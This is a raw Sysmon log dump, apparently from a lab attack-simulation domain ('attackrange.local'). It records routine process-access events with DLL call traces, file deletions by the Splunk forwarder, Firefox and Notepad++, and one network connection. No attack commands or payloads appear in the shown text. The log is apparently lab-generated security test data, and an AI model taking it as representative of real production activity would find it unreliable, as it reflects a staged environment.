07:54:55.554{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001049878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:55.554{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RP
CRT4.dll+1ae1c 10341000x80000000000000001049869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.538{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:55.538{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:55.538{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:55.538{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:55.538{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001049864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.507{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4C3341BC932D61AC4EFF0B61CE78382A,SHA256=3CB635BC1AF5C93EDFEEDDAF41AAD2C2A79B5361745E89CE853477B62257B75B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.307{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50A3071FDCC815EC5D1481FA594828A0,SHA256=7B41CE98B174C5DD14585C849D6B425DC74AC9F7B4398F0AB8C8D0C9C3FB3727,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808035Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:56.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8947417F7DBC0E3C6C97181B868F3CA,SHA256=BA345B020BE1699B8CDB1F7B97F5F94413E45933A97FD266DADE656153521578,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:48.632{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51064-false10.0.1.12-8000- 23542300x80000000000000001049881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:56.906{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075428MD5=EC36445458EF3886C65ED208690EC0A4,SHA256=12FC02A80DD6E948A37EBC0B8E26E5B220A0B868EE97A354D3CDFACECB3EF448,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:56.322{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4A43B1B8C5774ACC230191A3565B779,SHA256=9ECC76AA07839A2E7BAE669FF60C89B48C95FAE530409672508822E71F78C010,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808036Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:57.928{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02D18B23A348EEDE2A583902E019A96E,SHA256=7C3D108B4B67BECD4885F85CE852430CDC7C4366C1DD8FB85FCEAA1E28A73C64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.821{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D4D41712001D13AD00203A5580F20352,SHA256=DA4CB77822E043A95A4A678743084B9AE2CE935650B1E20F3EFD766ED02E7D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.821{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=51B457DD756C34E9ABCA621BE7818420,SHA256=DE5437C2F75E919D1CD06C43358D44C1EF0204BF35B8DDBA7034E81458157866,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.821{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=405DA19AB766F97B968EF73AF7D79B6D,SHA256=59CBCE63746B6CADE719E9BE1977D6B2C10345E6BACC310468E830401851C7B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8D491442B0D39B52D7BB48B77E09DB82,SHA256=20BAA3BD5E649103ABCDFC8E908FCC757795BB0EDE766CFB3DC5EC4639F6912C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=06A90A5E56578EC5C8B877DF6AA2B05E,SHA256=C4A358DD8F6C2444724C0FEAFA819C6EA6497CE692546378F264D2A79E5D24F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3C15162E18FC129796FDD919C2A893D1,SHA256=7427584ADE3300EACA5C8AB1CA72A5AFCB62D4C3B8160A678ABC0522340D674B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C2B46FF5E335DBD1FCFE69335B75BAB7,SHA256=8153A3D3DD313F54B39A55BADEF8148797A5D1BC69FB90DB230CCDF26FFA0AEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F2E9D027FFD41CFE43F0B0B05986A90C,SHA256=01074738F62E98E40CA54BBC372DEB9C4812EA99263101AB2A3D300BA73940D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=467963F2901561E7A3381E1AE0D13715,SHA256=9C38DBA59E9FD5C8F9CBC50EE00D9E66D598584F3EDED13A05B1DC186F65354F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 